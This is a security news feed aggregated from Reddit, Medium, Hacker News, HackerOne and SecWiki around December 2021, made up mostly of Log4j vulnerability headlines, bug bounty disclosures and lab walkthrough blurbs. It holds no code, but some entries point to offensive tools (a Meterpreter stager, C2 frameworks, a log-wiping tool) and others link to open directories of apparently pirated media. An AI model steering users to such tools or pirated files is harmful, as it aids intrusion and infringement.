    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
  • Open

    Custom Metasploit Module for Log4Shell Scanner
    In this article, we will discuss a customized Metasploit module I wrote for scanning applications vulnerable to Log4Shell as well as how… Continue reading on Medium »  ( 3 min )

  • Open

    Is it possible to encrypt my browsing data in a public wi-fi without using a VPN?
    I've been thinking a lot about this since recently a coffee shop near me opened, and it had open wifi. I do not want to pay for a VPN since I do not trust them for my data to show up as encrypted into the network. I found this on GitHub, but I have not tested it enough to see if it works. So can someone give any help with that? submitted by /u/ArturEPinheiro777 [link] [comments]  ( 2 min )
    Best Practices with Email DLP Exceptions
    Hey Guys, So we have our entire org covered with email DLP from O365, one of our vendors generally deals with sensitive data(social security numbers) and thus have requested to have a exception for them, what should be the best way to deal with it. Bypassing the entire DLP policy for an email ID although sounds easy but wanted to hear back some feedback on the best practices submitted by /u/w33ha_AD [link] [comments]  ( 1 min )
    I've read about multiple data breaches at US cell phone carriers (ex: AT&T, T-Mobile). Where is this data going? Is there a way I can see if my information is floating around and how widely it is distributed?
    Basically, these hacks are pretty significant and I'd like to know both the depth and breadth of what people know about my personal information. Inb4: It's all out there, I suppose it is, but I want to know the specifics, if only out of curiosity. Like, if one alpha hacker knows and doesn't share it with anybody, I'm probably good because I'm neither rich nor famous enough to really draw his or her attention. If it's out in the open for all to see, on the other hand, somebody might harass me. I use a Yubikey so I'm good there. Thank you! submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Owning Internal networks is way too easy, what could Microsoft do to improve the situation?
    It's more surprising when you don't get domain admin. So many things are broken, the terrible implementation of name resolution, machines caching login credentials, passing the hash, golden tickets, NTLM relay, IPv6, WPAD, the list goes on. Surely there must be a better way. What are some improvements you would like to see from Microsoft? submitted by /u/ImTheMaddest [link] [comments]  ( 6 min )
  • Open

    Intruding 5G SA core networks from outside and inside
    submitted by /u/sebazzen [link] [comments]
    OSS Getting Hammered for BigCorp Failures
    submitted by /u/GelosSnake [link] [comments]  ( 1 min )
    Inside a PBX - Discovering a Firmware Backdoor
    submitted by /u/RedTeamPentesting [link] [comments]  ( 1 min )
    letme.go - A minimalistic Meterpreter stager written in Go
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046)
    submitted by /u/ScottContini [link] [comments]  ( 1 min )
  • Open

    A Simple Geolocation Exercise
    In September 2020, British army paratroopers performed a joint training excise with Ukrainian armed forces as part of Exercise Joint… Continue reading on Medium »  ( 3 min )
    How Not to Get “Caught” — An OPSEC (Operational Security) Advice Aware Analysis of a Modern…
    Have you ever dreamed of getting “caught” and actually making the headlines with your latest research that also includes the digirally… Continue reading on Medium »  ( 4 min )
    Setting them Straight — 10 Years Back in the Future — A Brief Overview of the Hacker Scene Circa…
    Do you remember the hacker scene circa the 90s? Check out this brief analysis of the Scene up to present day back then. Keep reading. Continue reading on Medium »  ( 5 min )
  • Open

    An adorable twenty-seven second stop-motion video titled, "themonster.mov"
    submitted by /u/HGMIV926 [link] [comments]  ( 2 min )
    pictures of britain
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Betty's recipes.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Sharing my movie theme music collection
    submitted by /u/ercohn [link] [comments]  ( 1 min )
    X Files complete series 1080p (English and Spanish subs)
    submitted by /u/Skajuan [link] [comments]  ( 1 min )
  • Open

    Inverting PhotoDNA with Machine Learning
    submitted by /u/anishathalye [link] [comments]  ( 1 min )
    X-Ways handling of ad1 images
    Does X-Ways have an issue with ad images? I currently have at least 200 ad1 images from a 750gb disk unallocated space. I need to do data carving on the totality of the images. When doing “refine volume snapshot” one image at a time, I sometimes have files that do not really represent what I am searching for. For example, on one image I could carve 18 files, all mp3 files. These are not the files I am looking for. I am searching for doc/docx files that I know are there (we did live forensic before acquiring the hdd). What are your thoughts on this? submitted by /u/MisterTroubadour [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-20 Review
    SecWiki周刊(第407期) by ourren CIS 介绍(下)-CIS Benchmark&CIS 社区防御模型2.0 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-20 Review
    SecWiki周刊(第407期) by ourren CIS 介绍(下)-CIS Benchmark&CIS 社区防御模型2.0 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Shellcode Generation with The Radare2 Framework
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    Log4j Vulnerability – What You Need to Know and How to Address Immediately
    Article URL: https://www.crestdatasys.com/blogs/log4j-vulnerability-what-you-need-to-know-and-how-to-address-immediately/ Comments URL: https://news.ycombinator.com/item?id=29622121 Points: 3 # Comments: 0  ( 4 min )
    Apache Log4j 2 vulnerability – Detection and fix simplified in your Java code
    Article URL: https://medium.com/@amitsoni4774/apache-log4j-2-vulnerability-detection-and-fix-simplified-in-your-java-code-9a6dd1d06796 Comments URL: https://news.ycombinator.com/item?id=29620987 Points: 2 # Comments: 0  ( 2 min )
  • Open

    Fuzzing
    Article URL: https://owasp.org/www-community/Fuzzing Comments URL: https://news.ycombinator.com/item?id=29620816 Points: 2 # Comments: 0  ( 4 min )

  • Open

    Moving my server sooo grab what you want. Super fast speeds TV/Music/Movies
    submitted by /u/Bryan2pointOh [link] [comments]  ( 1 min )
    What's your F***ing problem ?
    Hi everyone. I would like to talk about a subject that I consider abnormal. ​ First of all I would like to clarify that: ​ - I would like to apologize for this off topic - This post does not concern the 99% of OpenDirectories users, whom I also thank to keep this subreddit alive and for their work. - I would like to thank the moderation team, who do an excellent job. - I don't give a damn about karma points, my account can drop to -10,000, I don't care, it's just an "aesthetic feature". ​ There are times when some users post sites that they haven't thoroughly reviewed, and that's okay. In these publications, it happens that some content is illegal, immoral or whatever ... It is not the fault of the users who provided the link, it is something that happens. ​ But why, for cryi…  ( 4 min )
  • Open

    log4j — Getting to 2.16 and 2.17 is Only Critical If You Have Non-Default Logging Enabled
    submitted by /u/danielrm26 [link] [comments]  ( 2 min )
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    All in One SEO Plugin Vulnerability Affects 3M Sites
    Article URL: https://www.searchenginejournal.com/all-in-one-seo-vulnerability-2021/430230/ Comments URL: https://news.ycombinator.com/item?id=29615935 Points: 1 # Comments: 0  ( 4 min )
    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29611871 Points: 2 # Comments: 0  ( 6 min )
    Deep Understanding of Commits for Automated Vulnerability Identification
    Article URL: https://sites.google.com/view/du-commits/ Comments URL: https://news.ycombinator.com/item?id=29611738 Points: 1 # Comments: 0  ( 1 min )
    Xcode 13.2 contains Log4j vulnerability
    Article URL: https://developer.apple.com/forums/thread/696785 Comments URL: https://news.ycombinator.com/item?id=29610913 Points: 181 # Comments: 41  ( 4 min )
  • Open

    GDB/Pedas Help
    I've set up GDB and Peda, and peda works fine except some commands require sudo. However, whenever I run GDB with sudo, it loads plain GDB without peda. I've edited the .gdbinit file as the instructions say. Any help would be appreciated. submitted by /u/Radiant-Midnight-278 [link] [comments]
  • Open

    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh [link] [comments]  ( 1 min )
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan [link] [comments]  ( 1 min )
  • Open

    The Insidious Need for Speed
    “We need it yesterday. Speed kills. Coffee is for closers. First to market. If you’re in control, you’re not going fast enough.” Continue reading on Medium »  ( 4 min )
    OSINT CASE STUDY 1
    disclaimer: education purpose only Continue reading on Medium »  ( 2 min )
    Uncovering the hackers, who stole your Facebook account
    About 6-months ago I was sitting at my desk, working on my CS145 homework, when I heard a familiar ding, a new message on Facebook… Continue reading on Medium »  ( 4 min )
  • Open

    SecWiki News 2021-12-19 Review
    SPEL表达式注入漏洞深入分析 by ourren 基于异常行为检测CobaltStrike by ourren 基于规则向量化的HTTP资产识别方法探索 by ourren 浅谈被动式IAST产品与技术实现-代码实现Demo篇 by ourren 浅谈被动式IAST产品与技术实现-基础篇 by ourren Codeql 挖洞? by ourren 应急响应:没有痕迹该如何进行攻击溯源 by ourren 几款小众而实用的远控软件 by ourren iMessage 零点击漏洞利用细节公开 by ourren ACSAC 2021 论文录用列表 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-19 Review
    SPEL表达式注入漏洞深入分析 by ourren 基于异常行为检测CobaltStrike by ourren 基于规则向量化的HTTP资产识别方法探索 by ourren 浅谈被动式IAST产品与技术实现-代码实现Demo篇 by ourren 浅谈被动式IAST产品与技术实现-基础篇 by ourren Codeql 挖洞? by ourren 应急响应:没有痕迹该如何进行攻击溯源 by ourren 几款小众而实用的远控软件 by ourren iMessage 零点击漏洞利用细节公开 by ourren ACSAC 2021 论文录用列表 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    digital world.local: Vengeance Vulnhub Walkthrough
    Donavan’s VENGEANCE (digitalworld.local: VENGEANCE) is a medium level machine designed for Vulnhub. This lab includes a difficult exploitation procedure that is suitable for those experienced The post digital world.local: Vengeance Vulnhub Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    digital world.local: Vengeance Vulnhub Walkthrough
    Donavan’s VENGEANCE (digitalworld.local: VENGEANCE) is a medium level machine designed for Vulnhub. This lab includes a difficult exploitation procedure that is suitable for those experienced The post digital world.local: Vengeance Vulnhub Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Unauthorized access to choice.av.ru control panel
    Azbuka Vkusa disclosed a bug submitted by wocat: https://hackerone.com/reports/963161 - Bounty: $100
    Open redirect (DOM-based) on av.ru via "return_url" parameter (Login form)
    Azbuka Vkusa disclosed a bug submitted by zophi: https://hackerone.com/reports/958864 - Bounty: $100
    Dependency repository hijacking aka Repo Jacking from GitHub repo rubygems/bundler-site & rubygems/bundler.github.io + bundler.io docs
    RubyGems disclosed a bug submitted by akincibor: https://hackerone.com/reports/1430405
  • Open

    [Cullinan #24] Add ESI Injection and Update Others
    컬리넌 업데이트 로그 #24입니다. ESI Injection을 추가했고, SSTI에 RCE 관련 내용 추가, 그리고 도구 업데이트가 있었습니다. 마지막으로 Cullinan의 메인 페이지 디자인의 일부를 수정(max-width 제거)했습니다. Add ESI Injection Update SSTI (Add RCE, Update Tools) Update Cullinan Design ESI Injection은 제가 블로그 글로 공유드린지 벌써 3년도 넘은 항목인데요, 실무에서도 자주 보이는 케이스는 아니라서 잊고 있다가 최근에 Cullinan 쪽으로 추가하게 됬습니다. 그래도 재미있는 취약점이니 한번쯤은 읽어보시는 것 추천드립니다 :D
  • Open

    Trip.com: First Step towards Cloud Native Security
    TL; DR This post shares our explorations on cloud native securities for Kubernetes as well as legacy workloads, with CiliumNetworkPolicy for L3/L4 access control as the first step. TL; DR 1 Introduction 1.1 Access control in Kubernetes 1.2 Implementation and extension in Cilium 1.3 Challenges in large deployments 1.4 Organization of this post 2 Access control: from requirements to a solution 2.1 Policy enforcement in a single cluster 2.2 Policy enforcement over multiple clusters 2.2.1 ClusterMesh 2.2.2 KVStoreMesh 2.3 Policy enforcement over legacy clients 2.3.1 CiliumExternalResource (CER) 2.3.2 cer-apiserver 2.3.3 Sum up: a hybrid data plane 2.4 Control plane 2.4.1 Access control policy (ACP) modeling 2.4.2 Enforcer-specific adapters 2.4.3 Push (and reconc…

  • Open

    Log4j 2.17.0 released, for third CVE (CVE-20 21-45105)
    Article URL: https://logging.apache.org/log4j/2.x/index.html Comments URL: https://news.ycombinator.com/item?id=29609578 Points: 3 # Comments: 2  ( 5 min )
    Third High Severity CVE in Log4j Is Published
    Article URL: https://logging.apache.org/log4j/2.x/security.html Comments URL: https://news.ycombinator.com/item?id=29604097 Points: 430 # Comments: 306  ( 11 min )
  • Open

    Patch fixing critical Log4j 0-day has its own vulnerability that’s under exploit
    Article URL: https://arstechnica.com/information-technology/2021/12/patch-fixing-critical-log4j-0-day-has-its-own-vulnerability-thats-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=29609295 Points: 2 # Comments: 0  ( 3 min )
    Apache Log4j Vulnerability Webinar – What You Need to Know
    Article URL: https://www.criticalinsight.com/resources/news/article/apache-log4j-vulnerability-webinar-what-you-need-to-know/ Comments URL: https://news.ycombinator.com/item?id=29608959 Points: 1 # Comments: 0  ( 2 min )
  • Open

    How.It.Made
    submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    A few directories with small amount of music
    Index of /stuff/mp3/amd (audio.msk.ru) Index of /music/funk (czyborra.com) Index of /files (rarekindrecords.co.uk) Index of /audio/ (martindoyleflutes.com) (music from an irish flute player) Index of /files/mp3 (saparov.ru) Index of /albums/4151 (soton.ac.uk) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Want to know some line-dancing moves? Here's some PDFs that show you some dance steps.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
  • Open

    Reasons to go looking in the Registry
    Chris Sanders tweeted out an interesting pair of questions recently, and the simple fact is that for me to fully answer the question, the tweet thread would be just too extensive. The questions were: What are the most common reasons you go looking in the Windows registry? What do you use it to prove most? Like almost everything else in DFIR, my response to the both questions is, it depends. Why? Well, it depends upon the goals of your investigation. What I use the Registry to prove depends heavily on what I'm trying to prove, or to disprove. This may sound pretty obvious, and even intuitive, but far too often in DFIR, we can find ourselves far too easily chasing down rabbit holes that have little, if anything, to do with our investigative goals. Configuration The Windows Registry holds a g…  ( 7 min )
  • Open

    Preferred method of collecting folders or loose documents on Macs ?
    I'm using Sumuri Recon and looking through the features but it seems to be an all or nothing product (imaging the entire disk/volume. This is not confirmed by any means. I haven't spent enough time with Sumuri but It doesn't appear to allow for Collection of specific folders. Anyone here have experience with small targeted forensic sound collections on Macs. The hardware dongle makes this a small painpoint as it would be nice to remotely preserve a few documents in a defensible manner. This is very simple when dealing with Windows devices where FTK imager can be installed and executed within seconds. Anyone aware of a Mac APFS equivalent? This particular remote MacBook pro is on Catalina (APFS) and I have all the keys to the castle. I'm not as interested in preserving extended Metadata as I am in the plain created and modified date. Perhaps a zipping solution that preserves these two dates? submitted by /u/zero-skill-samus [link] [comments]  ( 1 min )
    How does forensic imaging of locked cellular devices work?
    I've been looking into mobile forensics and I've realized that everything I come across pertaining to imaging a filesystem starts with "Unlock the device". This doesn't quite make sense to me, because if an LEO gets a warrant to search a phone, the owner obviously doesn't have to tell them/enter the password. And from what I can tell, the only way to really "get" the password starts off with imaging the filesystem/creating a backup. Am I missing something? submitted by /u/Fusiondew [link] [comments]  ( 4 min )
    CCTV went down
    Hello to all forensicators, We have a weird situation where about 20 of our CCTVs just stopped recording. One of our external vendors was running a VAPT test on the vlan containing the cameras at the same time they went down. The CCTV logs show us that XSS and SQL injection attacks were being run on the cameras. Checking the application log tells us the time when the cameras stopped recording and the time they got back online. However I am unable to figure out what was the exact attack that brought down the cameras. What logs should I be looking at to figure this out? submitted by /u/indianadmin [link] [comments]  ( 1 min )
    VPN data exfiltration
    A colleague of mine was referencing someone using a Kali Linux USB drive on a windows 10 machine and connecting to a VPN. They believe the individual was pushing business related data through the VPN that was unauthorized. Is there anything forensically that one could look for on what might have gone outbound on the EO1? submitted by /u/WhoAteTheLastCookie [link] [comments]  ( 2 min )
  • Open

    A Detailed Guide on Log4J Penetration Testing
    In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the The post A Detailed Guide on Log4J Penetration Testing appeared first on Hacking Articles.  ( 8 min )
  • Open

    A Detailed Guide on Log4J Penetration Testing
    In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the The post A Detailed Guide on Log4J Penetration Testing appeared first on Hacking Articles.  ( 8 min )
  • Open

    SecWiki News 2021-12-18 Review
    CVE-2016-7124反序列化漏洞复现 by SecIN社区 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-18 Review
    CVE-2016-7124反序列化漏洞复现 by SecIN社区 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    ESI(Edge Side Include) Injection
    🔍 Introduction ESIi는 ESI(Edge Side Include) Injection으로 ESI 사용하는 환경에서 해당 Markup에 대한 Injection 공격을 의미합니다. ESI는 Edge Side Include의 약자로 인터넷의 Edge에서 웹 애플리케이션의 동적 어셈블리 및 전송을 위한 웹 페이지 구성 요소를 정의하는 데 사용되는 간단한 마크업 언어입니다. Page assembly를 위한 표준 태그로 웹 캐시, LB 등의 구조에서 사용됩니다. HTML 코드 내에서 ESI는 아래와 같이 태그로 웹 브라우저로 Response body가 넘어오기 전에 ESI를 처리할 수 있는 캐시 서버등에서 미리 처리되어 데이터가 넘어오게 됩니다.
  • Open

    HackMyVM — Forbidden
    Writeup (Español) Continue reading on Medium »  ( 3 min )
    Should You Trust Your Admin Tools?
    No, not really Continue reading on Medium »  ( 4 min )
  • Open

    Stored XSS on 1.4.0
    ImpressCMS disclosed a bug submitted by tehwinsam: https://hackerone.com/reports/1331281
    HTML injection in email content during registration via FirstName/LastName parameter
    MTN Group disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1256496
    Flickr Account Takeover using AWS Cognito API
    Flickr disclosed a bug submitted by lauritz: https://hackerone.com/reports/1342088 - Bounty: $7550
  • Open

    Alternative Process Injection
    submitted by /u/dmchell [link] [comments]
  • Open

    lurch1317: A new pidgin plugin with strong crypto for deniablity (WIP)
    submitted by /u/hardenedvault [link] [comments]  ( 1 min )
    Log4j version 2.17.0 fixes a new problem CVE-2021-45105 DoS vuln (CVSS score of 7.5)
    submitted by /u/ScottContini [link] [comments]  ( 2 min )
  • Open

    [Day 16] OSINT Ransomware Madness | Advent of Cyber 3 (2021)
    OSINT stands for Open Source Intelligence, information that can be obtained from free and public sources. Offensive teams commonly use… Continue reading on Medium »  ( 3 min )

  • Open

    Threat Intelligence on Log4j CVE: Key Findings and Their Implications
    Article URL: https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications Comments URL: https://news.ycombinator.com/item?id=29599546 Points: 1 # Comments: 0  ( 6 min )
    Security in context: When is a CVE not a CVE?
    Article URL: https://snyk.io/blog/when-is-a-cve-not-a-cve/ Comments URL: https://news.ycombinator.com/item?id=29589692 Points: 2 # Comments: 0  ( 5 min )
    Bypass of allowedLdapHost check in Log4j 2.15.0 – Log4Shell (CVE-2021-44228)
    Article URL: https://twitter.com/marcioalm/status/1471740771581652995 Comments URL: https://news.ycombinator.com/item?id=29588947 Points: 3 # Comments: 1  ( 1 min )
    Risk analysis of Log4Shell (CVE-2021-44228) and mitigation
    Article URL: https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html Comments URL: https://news.ycombinator.com/item?id=29587870 Points: 1 # Comments: 0  ( 4 min )
  • Open

    If You're Not Doing Continuous Asset Management You're Not Doing Security
    submitted by /u/danielrm26 [link] [comments]  ( 3 min )
    Fail2ban / Regexp rule against LOG4J vuln
    submitted by /u/AGS42 [link] [comments]
    Log4Shell Update: Full bypass found in log4j 2.15.0, enabling RCE again (with payload)
    submitted by /u/freeqaz [link] [comments]  ( 2 min )
  • Open

    A website's gone
    What happened to the.eye? Is it dead, dead or is there a second website? Also, the link to the discord that the automod gave me was invalid. submitted by /u/Sleepingpiranha [link] [comments]  ( 2 min )
    A large collection of indiscriminately-named mp3 music.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Sparks albums
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
  • Open

    html injection at judge.me
    Judge.me disclosed a bug submitted by 0xteles: https://hackerone.com/reports/1036995
    Reflected Cross-Site Scripting/HTML Injection
    Informatica disclosed a bug submitted by jak0_: https://hackerone.com/reports/1379158
  • Open

    SecWiki News 2021-12-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    CALDERA
    Hey everyone, Does anyone here use or have used CALDERA? A small question regarding initial access; Are we meant to deploy an agent locally then do lateral movement within the network to reach another target machines? Thank you! submitted by /u/lifeislemon_not_cake [link] [comments]  ( 1 min )
  • Open

    Apache Log4j 2, Flexera and you
    By now, you’ve probably learned of Apache Log4j 2. As reported across the web, there is the recently disclosed CVE-2021-44228 vulnerability in Apache Log4j 2 (widely referred to as Log4Shell) affecting organizations far and wide. This is a critical vulnerability in Apache Log4j 2, impacting versions from 2.0-beta9 to 2.14.1. And now you’ve likely been asking, “Where is this vulnerability within my own IT ecosystem, and how do I mitigate it if necessary?” Flexera is helping work through the issue with our customers by ensuring immediate visibility of the impact of this and other vulnerabilities within their IT estate. Flexera…
  • Open

    Extract sms messages from Google Backup? Cellebrite failed on Android/Samsung
    I've tried using Cellebrite Cloud to extract messages from a Google drive Android backup (Android sends Google backups to Google Drive). It failed to parse after running several tests using my own device. I also tried to access my Samsung backup which includes messages. Celkebrite Cloud failed to login at all. Has anyone had any success accessing or extracting sms from Android Google backups or Samsung backups? It's unfortunate when tools provide that service yet fail to perform. submitted by /u/zero-skill-samus [link] [comments]  ( 2 min )

  • Open

    CHFI 2021 Exam Review
    As some of you may know, CHFI is considered to be the base line of computer forensics certifications which is why I thought that buying a test and course from EC-Council would be the place to start. I will lay out the topics that I was NOT expecting to get tested on. Let me preface by saying that there is NO one study guide out there that will prepare you for your test. You will hear people saying "I didn't study and still passed/I studied for two weeks and passed." Unless, you've worked as a SOC Analyst or have 2 years of prior computer forensics, you will fail. I began studying in January of this year and took the test in October. I failed with a 57%. While you need a 75%~ to pass, there are things the EC-Council test prep package did NOT prepare me for and the only reason why I got…  ( 4 min )
    SUMURI RECON ITR now has the ability to physically image M1, M1 Max, and M1 Pro Mac computer
    submitted by /u/acw750 [link] [comments]  ( 1 min )
    Detecting RAID parameters for rebuild
    Hi all, I have 3 E01 raid discs from a QNAP device, which i try to rebuild. X-ways , OS forenics and mdadm don't recognize the raid parameters automatically. So the day is finally come to learn more about raid.... Is here somebody who can point me out to some good reading on how to extract these parameters from the discs? Thanks in advance! submitted by /u/Lizzy4235 [link] [comments]  ( 1 min )
  • Open

    Google storage bucket takeover which is used to load JS file in dashboard.html in "github.com/kubernetes/release" which can lead to XSS
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398706 - Bounty: $100
    Race Condition Vulnerability when creating profiles
    Showmax disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1428690
    Able to access private picture/video/writing when requesting for their JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1424291 - Bounty: $250
    Broken Link Takeover from kubernetes.io docs
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398572 - Bounty: $100
    Broken Github Link Used in deployment docs of "github.com/kubernetes/kompose"
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398617 - Bounty: $100
  • Open

    digital world.local: FALL Vulnhub Walkthrough
    FALL (digitalworld.local: FALL) is a medium level machine created by Donavan for Vulnhub. This lab is appropriate for some experienced CTF players who wish to The post digital world.local: FALL Vulnhub Walkthrough appeared first on Hacking Articles.  ( 5 min )
    Thales1 Vulnhub Walkthrough
    “Thales” is a Capture the Flag challenge available on Vulnhub. MachineBoy deserves credit for developing this box. In this box, we will learn how to The post Thales1 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    digital world.local: FALL Vulnhub Walkthrough
    FALL (digitalworld.local: FALL) is a medium level machine created by Donavan for Vulnhub. This lab is appropriate for some experienced CTF players who wish to The post digital world.local: FALL Vulnhub Walkthrough appeared first on Hacking Articles.  ( 5 min )
    Thales1 Vulnhub Walkthrough
    “Thales” is a Capture the Flag challenge available on Vulnhub. MachineBoy deserves credit for developing this box. In this box, we will learn how to The post Thales1 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Forgiveness
    I forgive you for your first lies. I forgive myself for believing into it. Continue reading on Medium »  ( 1 min )
  • Open

    Mitigating the Log4Shell vulnerability (CVE-2021-44228) on DietPi
    Article URL: https://dietpi.com/blog/?p=1172 Comments URL: https://news.ycombinator.com/item?id=29581625 Points: 2 # Comments: 0  ( 5 min )
    Securing K8s clusters for Log4j CVE-2021-44228
    Article URL: https://github.com/kubearmor/log4j-CVE-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29573520 Points: 1 # Comments: 0  ( 7 min )
  • Open

    Old programs for WIN & MAC (Office 95, Encarta, iLife, etc) and ISOs
    Aux francais mostly http://145.239.62.120/download_center/repos/Applications/ http://145.239.62.120/download_center/repos/ISOs/ submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-16 Review
    Log4j2远程代码执行漏洞检测和防护策略研究 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-16 Review
    Log4j2远程代码执行漏洞检测和防护策略研究 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Nighthawk 0.1 - New Beginnings - @MDSecLabs
    submitted by /u/dmchell [link] [comments]  ( 1 min )

  • Open

    Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    My road map !! Need help
    This isy roadmap to be a red teamer Is anything need to change 1- learn programming ---python ---C/C++ 2-Networking and OS ---Linux ---IT and Networking Basics ---THM Pre security path 3-Web Security ---THM Web fundamentals path ---OWASP TOP 10 Guide 4-Hacking Basics ---THM Complete beginner path ---INE PTS Course ---THM jr penetration tester path 5- Doing CTFs ---THM ---Hack the box ---Velnhub 6-The OSCP 7-Red team Certs ---pentester academy CRTP ---pentester academy CRTE ---Offensive security OSCE ---NOTES--- I am a computer science student I have learned C++ and python scripting And linux command line submitted by /u/Ok_Attempt_3411 [link] [comments]  ( 2 min )
    Guys, does anyone knows anything about 7asecurity.com course content?
    Guys, does anyone knows anything about 7asecurity.com course content? submitted by /u/Select_Plane_1073 [link] [comments]  ( 1 min )
  • Open

    Windows Credential Manager for hackers
    Windows can store credentials for easy reuse. There are several ways to access them. Continue reading on System Weakness »  ( 3 min )
    Runas for hackers
    Please, refer to the post on Credential Manager if you are interested in seeing how to manage stored credentials in windows. This will be… Continue reading on System Weakness »  ( 4 min )
    HackMyVM — Twisted
    Writeup (Español) Continue reading on Medium »  ( 2 min )
  • Open

    Hot-patch CVE-2021-44228 by exploiting the vulnerability itself
    Article URL: https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch Comments URL: https://news.ycombinator.com/item?id=29571694 Points: 1 # Comments: 0  ( 1 min )
    Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE)
    Article URL: https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/ Comments URL: https://news.ycombinator.com/item?id=29569587 Points: 2 # Comments: 0  ( 10 min )
    Protection against CVE-2021-45046, the additional Log4j RCE vulnerability
    Article URL: https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29568125 Points: 3 # Comments: 0
    Log4j Vulnerability (CVE-2021-44228)
    Article URL: https://github.com/NCSC-NL/log4shell Comments URL: https://news.ycombinator.com/item?id=29563247 Points: 2 # Comments: 0  ( 3 min )
    Google Chrome Zero Day CVE-2021-4102, Use after free in V8
    Article URL: https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html Comments URL: https://news.ycombinator.com/item?id=29561740 Points: 82 # Comments: 27  ( 6 min )
  • Open

    Weak rate limit could lead to ATO due to weak password protection mechanisms
    Reddit disclosed a bug submitted by bombon: https://hackerone.com/reports/1065186 - Bounty: $100
    No rate limit on password reset leads to email enumeration at gateway-production.dubsmash.com
    Reddit disclosed a bug submitted by cracker922: https://hackerone.com/reports/1425884
    Untitled
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/584582 - Bounty: $500
    reflected xss in e.mail.ru
    Mail.ru disclosed a bug submitted by seifelsallamy: https://hackerone.com/reports/1379297 - Bounty: $1000
  • Open

    A collection of gifs
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-15 Review
    《软件分析》完整版课程视频 by ourren 从Log4shell事件看资产风险运营工程化的困局与盲点 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-15 Review
    《软件分析》完整版课程视频 by ourren 从Log4shell事件看资产风险运营工程化的困局与盲点 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Intro to Bitcoin investigation and wallet seizure - types of wallets, seeds, keys, and transactions
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
  • Open

    A TL;DR technical explanation of the log4j vulnerability
    submitted by /u/sn1pr0s [link] [comments]  ( 1 min )
  • Open

    【安全通报】微软12月漏洞补丁日修复多个高危漏洞
    近日,微软发布 12 月份安全补丁,共修复了 67 个针对微软产品的CVE漏洞,其中 7个严重漏洞,60个高危漏洞。涉及 Windows 和 Windows 组件、ASP.NET Core 和 Vis...  ( 2 min )
  • Open

    【安全通报】微软12月漏洞补丁日修复多个高危漏洞
    近日,微软发布 12 月份安全补丁,共修复了 67 个针对微软产品的CVE漏洞,其中 7个严重漏洞,60个高危漏洞。涉及 Windows 和 Windows 组件、ASP.NET Core 和 Vis...  ( 2 min )

  • Open

    CISA Log4j (CVE-2021-44228) Vulnerability Guidance
